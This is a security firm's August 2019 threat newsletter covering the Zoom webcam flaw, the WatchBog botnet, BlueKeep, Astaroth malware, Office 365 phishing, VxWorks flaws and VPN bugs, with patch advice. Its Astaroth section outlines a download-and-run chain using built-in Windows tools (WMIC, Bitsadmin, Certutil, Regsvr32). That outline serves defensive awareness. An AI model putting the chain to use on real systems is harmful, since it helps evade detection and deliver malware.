Shearwater Security Report | August 2019

Current Threats and Exploits

· Getting Zoomed

Getting-ZoomedA flaw in leading online meeting and video conferencing platform Zoom, forces users onto video and audio calls without their consent.

The popular application can be misused to forcibly join people onto calls. It does this by activating microphones and video cameras on Mac computers without user permission.

Security researcher Jonathan Leitschuh, from software development automation company Gradle, was curious how clicking on a sent meeting link would start up users’ Zoom clients from a web browser. Leitschuh thought it was an “amazing bit of functionality” and wondered how it had been implemented securely by Zoom.

His curiosity led to the discovery of two serious vulnerabilities that are very simple to exploit, and which Leitschuh said exposes up to 750,000 companies around the world with over four million webcams being activated by malicious websites.(1)

Zoom has released a patch to remedy the vulnerability which can be found HERE. By installing the patch, malicious third parties will no longer be able to automatically activate webcams using a Zoom link. 


· Watching the WatchBog

Watching-the-WatchBog-A new version of WatchBog – a cryptocurrency-mining botnet operational since late 2018 – has been discovered to have compromised more than 4,500 Linux machines since early June.

This version of WatchBog has the ability to scan Windows computers and implements a BlueKeep Remote Desktop Protocol (RDP) vulnerability scanner. It is believed that the presence of this scanner indicates that WatchBog is preparing a list of vulnerable systems to target in the future, or possibly intends to sell a list of vulnerable systems to third party vendors for profit.

The malware is currently undetected by all security vendors

BlueKeep is a remote code execution vulnerability present in the Windows Remote Desktop Services and enables remote unauthenticated attackers to run arbitrary code, conduct denial of service attacks and potentially take control of vulnerable systems.

In May, Microsoft patched the Remote Code Execution (RCE) flaw that impacts several versions, from Windows XP, Vista, and 7 to Windows Server 2003 and 2008, including all versions with installed Service Packs.(2)

According to Microsoft, customers who use an in-support version of Windows (i.e. Windows 7, Windows Server 2008 R2, and Windows Server 2008) and have automatic updates enabled are automatically protected from the released patch.

However, out-of-support operating systems such as Windows XP and Windows 2003 are also affected by the critical CVE-2019-0708 flaw, with users of these Windows versions having to either upgrade to newer releases or to apply the security updates available via KB4500705.

Windows 8 and Windows 10 users are not impacted by the vulnerability because of the strengthened security provided by Redmond with the latest Windows releases.


· Astaroth – The Great Duke of Hell

Astaroth-The-Great-Duke-of-Hell-Astaroth is the Great Duke of Hell in demonology. Along with Beelzebub and Lucifer, they make up the evil trinity. 

So it was appropriate that when researchers from Microsoft detected a fileless malware campaign that uses legitimate services to deliver its payload, it was dubbed Astaroth.

The malware was detected while looking into a recent spike in the use of the Windows Management Instrumentation Command-line (WMIC) tool. 

When Astaroth is executed, the LNK file causes the execution of the WMIC tool with the ‘/Format’ parameter, which allows the download and execution of a JavaScript code. The JavaScript code in turn downloads payloads by abusing the Bitsadmin tool.

All the payloads are Base64-encoded and decoded using the Certutil tool. The Regsvr32 tool is then used to load one of the decoded DLLs, which in turn decrypts and loads other files until the final payload, Astaroth, is injected into the Userinit process. During the entire process, all files run are legitimate system tools, which could make it difficult for legacy security solutions to detect.(3)

Manual removal might be a lengthy and complicated process that requires advanced computer skills. It is preferable that you rely on your antivirus software. However, if you do need to remove Astaroth manually, CLICK HERE.


· Office 365 Licence Expiration Phishing

Office-365-Licence-Expiration-Phishing-A new phishing campaign has been detected which targets Office 365 administrators, rather than standard users.

The phishing emails indicate there is something wrong with an organisation’s Office 365 instance and the administrator should log in to fix the problem.

A common method is to send an email claiming the licence for Office 365 is about to expire. If the administrator clicks on the provided link, they will be taken to a fake Office 365 login page, hosted in Azure. As such, this allows the malicious actor to host the page with a * URL and even allows a legitimate certificate for the site.

The seemingly legitimate domain and valid certificate may convince the administrator to enter their credentials.

As with other phishing attempts, user training and the use of multi-factor authentication will often be sufficient to protect against such attacks.(4)

With Shearwater’s ‘Phriendly Phishing’ training modules, your staff will receive ongoing, targeted education to enable them to identify and handle dangerous emails containing malware or ransomware. CLICK HERE for further information about ‘Phriendly Phishing’.


· Up the Wind River Without a Paddle

Up-the-Wind-River-Without-a-Paddle-Researchers at Armis Labs have discovered 11 potentially serious security flaws affecting the Wind River VxWorks Real-Time Operating System (RTOS), described by the company as “the most widely used operating system you may never have heard about”. 

Collectively named ‘Urgent/11’ by Armis Labs, the flaws affect an estimated 200 million devices going back to an earlier version of VxWorks in 2006. Susceptible devices include routers, modems, firewalls, printers, VoIP phones, SCADA systems, IoT, and even MRI machines and elevators. 

Reported on some time ago, the list of 11 CVEs comprises six critical RCE flaws, plus five less serious issues that could lead to denial of service, information leaks, or logic errors. Exploiting the flaws would be relatively easy on devices accessible from the internet, or locally, however the exploit detection would be difficult. 

All versions of VxWorks since 6.5, released in 2006 are affected, as are some older versions where the software was used as a standalone TCP/IP stack and discontinued versions of Wind River Advanced Networking Technologies.(5)

To ensure you’re Wind River VxWorks Real-Time Operating System is updated with the latest patches, CLICK HERE.


Other News

· VPN Flaws Affect Widely Used Products

VPN-Flaws-Affect-Widely-Used-Products-Critical flaws in popular Virtual Private Networks (VPNs) could be exploited to gain access to corporate networks and steal data. The flaws are easily remotely exploitable; they affect VPNs from Palo Alto Networks, Pulse Secure, and Fortinet.

All three have released advisories and updates to address the issues. 

While the patches have been out for a while, scans found many devices online still running the vulnerable code. Organisations should ensure that boundary protections, including VPN, Firewalls, IDS/IPS are in maintenance schedules with priority for updates.(6)


· BlueKeep Exploit Instructions Posted Online

bluekeepOn the back of the recent BlueKeep exploit, information has been posted to GitHub which offers directions for exploiting the BlueKeep vulnerability.

A security researcher has published a detailed guide that shows how to execute malicious code on Windows computers still vulnerable to the critical BlueKeep vulnerability.

The move significantly lowers the bar for writing exploits that wreak the kinds of destructive attacks, not seen since the WannaCry and NotPetya attacks of 2017.(7)

To protect against BlueKeep, we strongly recommend you apply the Windows Update, which includes a patch for the vulnerability.

If you use Remote Desktop in your environment, it’s very important to apply all the updates. If you have Remote Desktop Protocol (RDP) listening on the internet, we also strongly encourage you to move the RDP listener behind some type of second factor authentication, such as VPN, SSL Tunnel, or RDP gateway.

You also want to enable Network Level Authentication (NLA), which is a mitigation to prevent un-authenticated access to the RDP tunnel. NLA forces users to authenticate before connecting to remote systems, which dramatically decreases the chance of success for RDP-based worms. The DART team highly recommends you enable NLA regardless of this patch, as it mitigates a whole slew of other attacks against RDP.


· Firefox Support for DNS over HTTPS


Mozilla has recently implemented support for the new protocol DNS over HTTPS into their Firefox web browser. The protocol will allow the browser to issue its own DNS queries to a remote server, with the whole session being both authenticated and encrypted using TLS.

Enabling this feature will improve privacy by disallowing anyone intercepting the users DNS traffic from having visibility of where the user is going. However, this same benefit can also make it more difficult for legitimate parties, observing the traffic, to log users’ actions and even block access to potentially harmful sites. In addition, as the DNS queries are tunnelled over HTTPS, it will likely be very difficult for an enterprise to prevent DNS without stopping traditional HTTPS from operating correctly.(8)



To stay secure, you need to be proactive.

Cybercriminals are constantly looking for ways to exploit vulnerabilities and will use any opportunity to circumvent your security systems.

Keep on top of the latest advances in cybersecurity and ensure your organisation stays ahead of the threats with Shearwater’s team of expert consultants.

Together, we’ll develop a comprehensive security roadmap for your organisation that takes into account your specific needs and circumstances.

Take the first step towards enhancing your security and speak with us today.




This Information Security Report is brought to you by Shearwater Solutions

The Information Security Report is a monthly summary, compiled by Shearwater’s experienced cybersecurity professionals, to highlight the vulnerabilities and new attack vectors in some of the latest active threats, exploits and breaches and share recommendations to help you protect your data and stay a step ahead.

Whatever your Information Security challenge, we’re here to help you find the right solution.